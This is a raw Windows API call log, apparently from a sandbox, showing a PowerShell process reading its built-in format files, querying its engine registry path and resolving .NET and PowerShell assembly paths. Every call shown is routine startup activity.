	[0409.273] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x20cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0409.273] SetErrorMode (uMode=0x1) returned 0x1
	[0409.273] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2fc
	[0409.273] GetFileType (hFile=0x2fc) returned 0x1
	[0409.273] SetErrorMode (uMode=0x1) returned 0x1
	[0409.273] GetFileType (hFile=0x2fc) returned 0x1
	[0409.273] ReadFile (in: hFile=0x2fc, lpBuffer=0x3511658, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d158, lpOverlapped=0x0 | out: lpBuffer=0x3511658*, lpNumberOfBytesRead=0x20d158*=0x1000, lpOverlapped=0x0) returned 1
	[0409.275] ReadFile (in: hFile=0x2fc, lpBuffer=0x3511658, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d158, lpOverlapped=0x0 | out: lpBuffer=0x3511658*, lpNumberOfBytesRead=0x20d158*=0x1000, lpOverlapped=0x0) returned 1
	[0409.275] ReadFile (in: hFile=0x2fc, lpBuffer=0x3511658, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d158, lpOverlapped=0x0 | out: lpBuffer=0x3511658*, lpNumberOfBytesRead=0x20d158*=0x1000, lpOverlapped=0x0) returned 1
	[0409.275] ReadFile (in: hFile=0x2fc, lpBuffer=0x3511658, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d158, lpOverlapped=0x0 | out: lpBuffer=0x3511658*, lpNumberOfBytesRead=0x20d158*=0x1000, lpOverlapped=0x0) returned 1
	[0409.276] ReadFile (in: hFile=0x2fc, lpBuffer=0x3511658, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d158, lpOverlapped=0x0 | out: lpBuffer=0x3511658*, lpNumberOfBytesRead=0x20d158*=0x1000, lpOverlapped=0x0) returned 1
	[0409.276] ReadFile (in: hFile=0x2fc, lpBuffer=0x3511658, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d158, lpOverlapped=0x0 | out: lpBuffer=0x3511658*, lpNumberOfBytesRead=0x20d158*=0x1000, lpOverlapped=0x0) returned 1
	[0409.276] ReadFile (in: hFile=0x2fc, lpBuffer=0x3511658, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d158, lpOverlapped=0x0 | out: lpBuffer=0x3511658*, lpNumberOfBytesRead=0x20d158*=0x9e2, lpOverlapped=0x0) returned 1
	[0409.276] ReadFile (in: hFile=0x2fc, lpBuffer=0x3510ba2, nNumberOfBytesToRead=0x21e, lpNumberOfBytesRead=0x20d158, lpOverlapped=0x0 | out: lpBuffer=0x3510ba2*, lpNumberOfBytesRead=0x20d158*=0x0, lpOverlapped=0x0) returned 1
	[0409.276] ReadFile (in: hFile=0x2fc, lpBuffer=0x3511658, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d158, lpOverlapped=0x0 | out: lpBuffer=0x3511658*, lpNumberOfBytesRead=0x20d158*=0x0, lpOverlapped=0x0) returned 1
	[0409.276] CloseHandle (hObject=0x2fc) returned 1
	[0409.277] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x20cea0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0409.277] SetErrorMode (uMode=0x1) returned 0x1
	[0409.277] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x20d100 | out: lpFileInformation=0x20d100*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d93418, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d93418, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e03e37, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1
	[0409.277] SetErrorMode (uMode=0x1) returned 0x1
	[0409.277] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x20ce30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0409.277] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d1e8 | out: phkResult=0x20d1e8*=0x2fc) returned 0x0
	[0409.277] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x20d16c, lpData=0x0, lpcbData=0x20d168*=0x0 | out: lpType=0x20d16c*=0x1, lpData=0x0, lpcbData=0x20d168*=0x56) returned 0x0
	[0409.277] CoTaskMemAlloc (cb=0x5a) returned 0x1b919bb0
	[0409.277] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x20d13c, lpData=0x1b919bb0, lpcbData=0x20d138*=0x56 | out: lpType=0x20d13c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x20d138*=0x56) returned 0x0
	[0409.277] CoTaskMemFree (pv=0x1b919bb0) 
	[0409.277] RegCloseKey (hKey=0x2fc) returned 0x0
	[0409.277] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x20ce30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0409.278] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x20cce0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0409.284] CoCreateGuid (in: pguid=0x20d410 | out: pguid=0x20d410*(Data1=0x54dc598b, Data2=0xbd9d, Data3=0x4fb0, Data4=([0]=0xb3, [1]=0xf7, [2]=0x54, [3]=0xfe, [4]=0x5c, [5]=0xeb, [6]=0xb3, [7]=0xd6))) returned 0x0
	[0409.608] CoCreateGuid (in: pguid=0x20d410 | out: pguid=0x20d410*(Data1=0x8b2761c7, Data2=0x3b72, Data3=0x4b58, Data4=([0]=0x8b, [1]=0x25, [2]=0x4f, [3]=0x9e, [4]=0x4a, [5]=0x76, [6]=0x21, [7]=0x9a))) returned 0x0
	[0409.609] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x20cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0409.609] SetErrorMode (uMode=0x1) returned 0x1
	[0409.609] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2fc
	[0409.609] GetFileType (hFile=0x2fc) returned 0x1
	[0409.609] SetErrorMode (uMode=0x1) returned 0x1
	[0409.609] GetFileType (hFile=0x2fc) returned 0x1
	[0409.609] ReadFile (in: hFile=0x2fc, lpBuffer=0x353c1c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d158, lpOverlapped=0x0 | out: lpBuffer=0x353c1c0*, lpNumberOfBytesRead=0x20d158*=0x1000, lpOverlapped=0x0) returned 1
	[0409.610] ReadFile (in: hFile=0x2fc, lpBuffer=0x353c1c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d158, lpOverlapped=0x0 | out: lpBuffer=0x353c1c0*, lpNumberOfBytesRead=0x20d158*=0x1000, lpOverlapped=0x0) returned 1
	[0409.610] ReadFile (in: hFile=0x2fc, lpBuffer=0x353c1c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d158, lpOverlapped=0x0 | out: lpBuffer=0x353c1c0*, lpNumberOfBytesRead=0x20d158*=0x1000, lpOverlapped=0x0) returned 1
	[0409.610] ReadFile (in: hFile=0x2fc, lpBuffer=0x353c1c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d158, lpOverlapped=0x0 | out: lpBuffer=0x353c1c0*, lpNumberOfBytesRead=0x20d158*=0x1000, lpOverlapped=0x0) returned 1
	[0409.610] ReadFile (in: hFile=0x2fc, lpBuffer=0x353c1c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d158, lpOverlapped=0x0 | out: lpBuffer=0x353c1c0*, lpNumberOfBytesRead=0x20d158*=0x1000, lpOverlapped=0x0) returned 1
	[0409.611] ReadFile (in: hFile=0x2fc, lpBuffer=0x353c1c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d158, lpOverlapped=0x0 | out: lpBuffer=0x353c1c0*, lpNumberOfBytesRead=0x20d158*=0xfb2, lpOverlapped=0x0) returned 1
	[0409.611] ReadFile (in: hFile=0x2fc, lpBuffer=0x353b8da, nNumberOfBytesToRead=0x4e, lpNumberOfBytesRead=0x20d158, lpOverlapped=0x0 | out: lpBuffer=0x353b8da*, lpNumberOfBytesRead=0x20d158*=0x0, lpOverlapped=0x0) returned 1
	[0409.611] ReadFile (in: hFile=0x2fc, lpBuffer=0x353c1c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d158, lpOverlapped=0x0 | out: lpBuffer=0x353c1c0*, lpNumberOfBytesRead=0x20d158*=0x0, lpOverlapped=0x0) returned 1
	[0409.611] CloseHandle (hObject=0x2fc) returned 1
	[0409.611] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x20cea0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0409.612] SetErrorMode (uMode=0x1) returned 0x1
	[0409.612] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x20d100 | out: lpFileInformation=0x20d100*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67f36317, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67f36317, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe6065417, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1
	[0409.612] SetErrorMode (uMode=0x1) returned 0x1
	[0409.612] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x20ce30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0409.612] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d1e8 | out: phkResult=0x20d1e8*=0x2fc) returned 0x0
	[0409.612] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x20d16c, lpData=0x0, lpcbData=0x20d168*=0x0 | out: lpType=0x20d16c*=0x1, lpData=0x0, lpcbData=0x20d168*=0x56) returned 0x0
	[0409.612] CoTaskMemAlloc (cb=0x5a) returned 0x1b919bb0
	[0409.612] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x20d13c, lpData=0x1b919bb0, lpcbData=0x20d138*=0x56 | out: lpType=0x20d13c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x20d138*=0x56) returned 0x0
	[0409.612] CoTaskMemFree (pv=0x1b919bb0) 
	[0409.612] RegCloseKey (hKey=0x2fc) returned 0x0
	[0409.612] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x20ce30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0409.612] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x20cce0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0409.614] CoCreateGuid (in: pguid=0x20d410 | out: pguid=0x20d410*(Data1=0xa72ae9f6, Data2=0x3a1, Data3=0x43b6, Data4=([0]=0xae, [1]=0xde, [2]=0x4d, [3]=0xa1, [4]=0x98, [5]=0x1b, [6]=0xa5, [7]=0xaa))) returned 0x0
	[0409.618] CoCreateGuid (in: pguid=0x20d410 | out: pguid=0x20d410*(Data1=0x8f127b19, Data2=0x201, Data3=0x4dda, Data4=([0]=0x92, [1]=0x9d, [2]=0xca, [3]=0xb3, [4]=0xf6, [5]=0x90, [6]=0xe1, [7]=0x11))) returned 0x0
	[0409.619] CoCreateGuid (in: pguid=0x20d410 | out: pguid=0x20d410*(Data1=0xe6290cc5, Data2=0x51aa, Data3=0x43c1, Data4=([0]=0x99, [1]=0x9, [2]=0xda, [3]=0x26, [4]=0xb, [5]=0xfe, [6]=0xac, [7]=0x41))) returned 0x0
	[0409.619] CoCreateGuid (in: pguid=0x20d410 | out: pguid=0x20d410*(Data1=0x3f69f3db, Data2=0xe84f, Data3=0x4318, Data4=([0]=0x85, [1]=0x58, [2]=0x4c, [3]=0xec, [4]=0xf, [5]=0x99, [6]=0xf6, [7]=0x82))) returned 0x0
	[0409.620] CoCreateGuid (in: pguid=0x20d410 | out: pguid=0x20d410*(Data1=0xaeeda747, Data2=0x27c4, Data3=0x4694, Data4=([0]=0xa8, [1]=0x85, [2]=0xb5, [3]=0x62, [4]=0x1a, [5]=0x47, [6]=0xd6, [7]=0x25))) returned 0x0
	[0409.620] CoCreateGuid (in: pguid=0x20d410 | out: pguid=0x20d410*(Data1=0x27b5d964, Data2=0x50, Data3=0x48b4, Data4=([0]=0x93, [1]=0x21, [2]=0xb1, [3]=0x70, [4]=0x1e, [5]=0xff, [6]=0xc4, [7]=0x75))) returned 0x0
	[0409.621] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x20cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0409.621] SetErrorMode (uMode=0x1) returned 0x1
	[0409.621] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2fc
	[0409.621] GetFileType (hFile=0x2fc) returned 0x1
	[0409.621] SetErrorMode (uMode=0x1) returned 0x1
	[0409.621] GetFileType (hFile=0x2fc) returned 0x1
	[0409.622] ReadFile (in: hFile=0x2fc, lpBuffer=0x3587f20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d158, lpOverlapped=0x0 | out: lpBuffer=0x3587f20*, lpNumberOfBytesRead=0x20d158*=0x1000, lpOverlapped=0x0) returned 1
	[0409.623] ReadFile (in: hFile=0x2fc, lpBuffer=0x3587f20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d158, lpOverlapped=0x0 | out: lpBuffer=0x3587f20*, lpNumberOfBytesRead=0x20d158*=0x1000, lpOverlapped=0x0) returned 1
	[0409.623] ReadFile (in: hFile=0x2fc, lpBuffer=0x3587f20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d158, lpOverlapped=0x0 | out: lpBuffer=0x3587f20*, lpNumberOfBytesRead=0x20d158*=0x1000, lpOverlapped=0x0) returned 1
	[0409.623] ReadFile (in: hFile=0x2fc, lpBuffer=0x3587f20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d158, lpOverlapped=0x0 | out: lpBuffer=0x3587f20*, lpNumberOfBytesRead=0x20d158*=0x1000, lpOverlapped=0x0) returned 1
	[0409.624] ReadFile (in: hFile=0x2fc, lpBuffer=0x3587f20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d158, lpOverlapped=0x0 | out: lpBuffer=0x3587f20*, lpNumberOfBytesRead=0x20d158*=0x1000, lpOverlapped=0x0) returned 1
	[0409.624] ReadFile (in: hFile=0x2fc, lpBuffer=0x3587f20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d158, lpOverlapped=0x0 | out: lpBuffer=0x3587f20*, lpNumberOfBytesRead=0x20d158*=0x1000, lpOverlapped=0x0) returned 1
	[0409.624] ReadFile (in: hFile=0x2fc, lpBuffer=0x3587f20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d158, lpOverlapped=0x0 | out: lpBuffer=0x3587f20*, lpNumberOfBytesRead=0x20d158*=0xaca, lpOverlapped=0x0) returned 1
	[0409.624] ReadFile (in: hFile=0x2fc, lpBuffer=0x3587552, nNumberOfBytesToRead=0x136, lpNumberOfBytesRead=0x20d158, lpOverlapped=0x0 | out: lpBuffer=0x3587552*, lpNumberOfBytesRead=0x20d158*=0x0, lpOverlapped=0x0) returned 1
	[0409.624] ReadFile (in: hFile=0x2fc, lpBuffer=0x3587f20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d158, lpOverlapped=0x0 | out: lpBuffer=0x3587f20*, lpNumberOfBytesRead=0x20d158*=0x0, lpOverlapped=0x0) returned 1
	[0409.624] CloseHandle (hObject=0x2fc) returned 1
	[0409.624] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x20cea0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0409.625] SetErrorMode (uMode=0x1) returned 0x1
	[0409.625] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x20d100 | out: lpFileInformation=0x20d100*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67ddf6d2, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67ddf6d2, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5dddcd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1
	[0409.625] SetErrorMode (uMode=0x1) returned 0x1
	[0409.625] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x20ce30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0409.625] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d1e8 | out: phkResult=0x20d1e8*=0x2fc) returned 0x0
	[0409.625] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x20d16c, lpData=0x0, lpcbData=0x20d168*=0x0 | out: lpType=0x20d16c*=0x1, lpData=0x0, lpcbData=0x20d168*=0x56) returned 0x0
	[0409.625] CoTaskMemAlloc (cb=0x5a) returned 0x1b919bb0
	[0409.625] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x20d13c, lpData=0x1b919bb0, lpcbData=0x20d138*=0x56 | out: lpType=0x20d13c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x20d138*=0x56) returned 0x0
	[0409.625] CoTaskMemFree (pv=0x1b919bb0) 
	[0409.625] RegCloseKey (hKey=0x2fc) returned 0x0
	[0409.625] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x20ce30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0409.625] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x20cce0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0410.072] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x20c670, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3c
	[0410.074] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x20c670, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0410.083] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0x20c670, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48
	[0410.091] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c670, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0410.093] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x20c670, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0410.094] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", nBufferLength=0x105, lpBuffer=0x20c670, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", lpFilePart=0x0) returned 0x52
	[0410.095] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", nBufferLength=0x105, lpBuffer=0x20c670, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", lpFilePart=0x0) returned 0x74
	[0410.096] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x20c670, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0410.097] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_64\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", nBufferLength=0x105, lpBuffer=0x20c670, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_64\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", lpFilePart=0x0) returned 0x60
	[0410.098] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x20c670, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0410.099] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x20c670, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0410.101] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x20c670, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0410.102] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", nBufferLength=0x105, lpBuffer=0x20c670, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", lpFilePart=0x0) returned 0x50
	[0410.103] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", nBufferLength=0x105, lpBuffer=0x20c670, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", lpFilePart=0x0) returned 0x5e
